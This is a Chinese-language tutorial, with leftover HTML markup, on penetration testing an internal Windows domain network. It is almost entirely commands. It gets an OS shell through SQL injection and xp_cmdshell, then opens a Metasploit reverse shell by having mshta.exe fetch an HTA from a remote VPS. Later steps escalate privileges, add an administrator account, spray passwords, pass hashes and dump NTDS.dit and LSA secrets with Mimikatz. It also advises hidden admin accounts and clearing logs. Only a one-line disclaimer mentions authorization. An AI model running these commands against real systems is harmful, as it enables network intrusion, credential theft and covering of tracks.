内网渗透实战教学文档<\/h1>

外网打点阶段<\/h2>

SQL注入获取Shell<\/h3>
使用SQLMap获取SQL Shell<\/strong><\/p>
sqlmap --sql-shell
<\/span><\/span><\/code><\/pre><\/li>

检查xp_cmdshell可用性<\/strong><\/p>
select<\/span> count<\/span>(*<\/span>) from<\/span> master.dbo.sysobjects where<\/span> xtype=<\/span>'x'<\/span> and<\/span> name=<\/span>'xp_cmdshell'<\/span>
<\/span><\/span><\/code><\/pre>返回结果为1表示存在xp_cmdshell<\/p>
<\/li>

启用xp_cmdshell<\/strong><\/p>
EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;RECONFIGURE;EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>, 1<\/span>;RECONFIGURE;
<\/span><\/span><\/code><\/pre><\/li>

执行系统命令<\/strong><\/p>
exec<\/span> master..xp_cmdshell 'whoami'<\/span>
<\/span><\/span><\/code><\/pre>注意：如果命令无回显，可能是服务器被降权<\/p>
<\/li>

获取服务器信息<\/strong><\/p>
select<\/span> @@<\/span>servername  -- 返回服务器名
<\/span><\/span><\/span><\/span>select<\/span> host_name()   -- 返回主机名
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
获取操作系统Shell<\/h3>


使用SQLMap获取OS Shell<\/strong><\/p>
sqlmap -r request.txt --os-shell
<\/span><\/span><\/code><\/pre><\/li>

目标系统信息<\/strong><\/p>

Web服务器操作系统: Windows 8.1或2012 R2<\/li>
Web应用技术: ASP.NET, Microsoft IIS 8.5, ASP<\/li>
后端DBMS: Microsoft SQL Server 2012<\/li>
<\/ul>
<\/li>
<\/ol>
权限提升阶段<\/h2>
MSF反弹Shell<\/h3>


使用mshta反弹Shell<\/strong><\/p>
msf6 exploit(<\/span>windows\/misc\/hta_server)<\/span> > run
<\/span><\/span><\/code><\/pre>在目标执行：<\/p>
mshta.exe http:\/\/vps:8080\/8HGLrG47OUEJ.hta
<\/span><\/span><\/code><\/pre><\/li>

获取Meterpreter会话<\/strong><\/p>
meterpreter > sysinfo
<\/span><\/span><\/code><\/pre>典型返回：<\/p>
Computer: DATABASE
OS: Windows 2012 R2 (6.3 Build 9600)
Architecture: x64
Domain: WEGO
<\/code><\/pre>
<\/li>
<\/ol>
提权方法<\/h3>


MSF提权模块<\/strong><\/p>
use post\/multi\/recon\/local_exploit_suggester
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>可能发现的漏洞：<\/p>

exploit\/windows\/local\/bypassuac_eventvwr<\/li>
exploit\/windows\/local\/ikeext_service<\/li>
exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc<\/li>
exploit\/windows\/local\/ms16_075_reflection<\/li>
exploit\/windows\/local\/ms16_075_reflection_juicy<\/li>
<\/ul>
<\/li>

CS提权<\/strong><\/p>

使用JuicyPotato插件(ms16-075)<\/li>
使用RottenPotato插件(ms16-075)<\/li>
<\/ul>
<\/li>

创建管理员用户<\/strong><\/p>
net localgroup Administrators good \/add
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
内网信息收集<\/h2>
网络配置信息<\/h3>
ipconfig \/all
<\/span><\/span>arp -a
<\/span><\/span><\/code><\/pre>域信息收集<\/h3>


查询域基本信息<\/strong><\/p>
net config Workstation
<\/span><\/span>net view \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域控制器<\/strong><\/p>
net group "domain controllers"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域管理员<\/strong><\/p>
net group "domain admins"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域用户<\/strong><\/p>
net user \/domain
<\/span><\/span><\/code><\/pre><\/li>

查询域内计算机<\/strong><\/p>
net view
<\/span><\/span>net group "domain computers"<\/span> \/domain
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
使用BloodHound收集域信息<\/h3>
SharpHound.exe -c all
<\/span><\/span><\/code><\/pre>内网横向移动<\/h2>
代理搭建<\/h3>

FRP代理配置<\/strong>

服务端配置(frps.ini):
[common]<\/span>
<\/span><\/span>bind_addr<\/span> =<\/span> 0.0.0.0<\/span>
<\/span><\/span>dashboard_user<\/span> =<\/span> good<\/span>
<\/span><\/span>dashboard_pwd<\/span> =<\/span> good <\/span>
<\/span><\/span>dashboard_port<\/span> =<\/span> 7500 <\/span>
<\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span>
<\/span><\/span><\/code><\/pre><\/li>
客户端配置(frpc.ini):
[common]<\/span>
<\/span><\/span>server_addr<\/span> =<\/span>1.1.1.1<\/span>
<\/span><\/span>server_port<\/span> =<\/span> 7000<\/span>
<\/span><\/span>
<\/span><\/span>[socks5]<\/span>
<\/span><\/span>type<\/span> =<\/span> tcp<\/span>
<\/span><\/span>remote_port<\/span> =<\/span> 60000<\/span>
<\/span><\/span>plugin<\/span> =<\/span> socks5<\/span>
<\/span><\/span>use_encryption<\/span> =<\/span> true<\/span>
<\/span><\/span>use_compression<\/span> =<\/span> true<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
批量扫描技术<\/h3>


端口扫描<\/strong><\/p>
fscan64.exe -h 10.10.10.1\/24 -p 445
<\/span><\/span><\/code><\/pre><\/li>

批量口令碰撞<\/strong><\/p>
fscan -h 10.10.10.5 -p 445<\/span> -np -user Administrator -pwd jo6ek6vul3vm,6 -domain WEGO
<\/span><\/span><\/code><\/pre><\/li>

MS17-010漏洞扫描<\/strong><\/p>
Ladon 10.10.10.8\/24 MS17010
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
哈希传递攻击(PTH)<\/h3>


使用smbexec.py<\/strong><\/p>
python3 smbexec.py administrator@10.10.10.3 -hashes :a9398c8a95dbe6801f280d2cfb9c76de
<\/span><\/span><\/code><\/pre><\/li>

使用CrackMapExec<\/strong><\/p>
crackmapexec smb 10.10.10.0\/24 -u Administrator -H a9398c8a95dbe6801f280d2cfb9c76de
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
域控攻击<\/h2>
提取域哈希<\/h3>


使用NTDSutil提取NTDS.dit<\/strong><\/p>
ntdsutil snapshot "activate instance ntds"<\/span> create quit quit
<\/span><\/span>ntdsutil snapshot "mount {GUID}"<\/span> quit quit
<\/span><\/span>copy<\/span> C:\$SNAP_...$\Windows\NTDS\ntds.dit c:\ntds.dit
<\/span><\/span><\/code><\/pre><\/li>

导出SAM和SYSTEM<\/strong><\/p>
reg save hklm\sam sam.hiv
<\/span><\/span>reg save hklm\system system.hiv
<\/span><\/span><\/code><\/pre><\/li>

使用secretsdump.py解析<\/strong><\/p>
python3 secretsdump.py -ntds ntds.dit -system system.hiv LOCAL
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
使用Mimikatz抓取密码<\/h3>
mimikatz.exe "privilege::debug"<\/span> "lsadump::lsa \/patch full"<\/span> exit >>log.txt
<\/span><\/span><\/code><\/pre>工具推荐<\/h2>


内网扫描工具<\/strong><\/p>

fscan: https:\/\/github.com\/shadow1ng\/fscan<\/li>
Ladon: 用于MS17-010扫描<\/li>
<\/ul>
<\/li>

提权工具<\/strong><\/p>

JuicyPotato: https:\/\/github.com\/scanfsec\/AggressorCNA<\/li>
Erebus: https:\/\/github.com\/DeEpinGh0st\/Erebus<\/li>
<\/ul>
<\/li>

哈希传递工具<\/strong><\/p>

smbexec.py (Impacket)<\/li>
CrackMapExec<\/li>
<\/ul>
<\/li>
<\/ol>
关键注意事项<\/h2>


权限维持<\/strong><\/p>

创建隐藏管理员账户<\/li>
多种方式保持访问权限<\/li>
<\/ul>
<\/li>

隐蔽性<\/strong><\/p>

尽量不使用3389远程桌面<\/li>
使用加密代理通道<\/li>
<\/ul>
<\/li>

横向移动策略<\/strong><\/p>

优先攻击域控制器<\/li>
然后攻击运维机器<\/li>
最后攻击普通工作站<\/li>
<\/ul>
<\/li>

清理痕迹<\/strong><\/p>

删除快照和临时文件<\/li>
清除日志记录<\/li>
<\/ul>
<\/li>
<\/ol>
本教学文档涵盖了从外网打点到内网横向移动的完整流程，重点介绍了各种技术手段和工具的使用方法。实际渗透测试中，请确保获得合法授权并遵守相关法律法规。<\/p>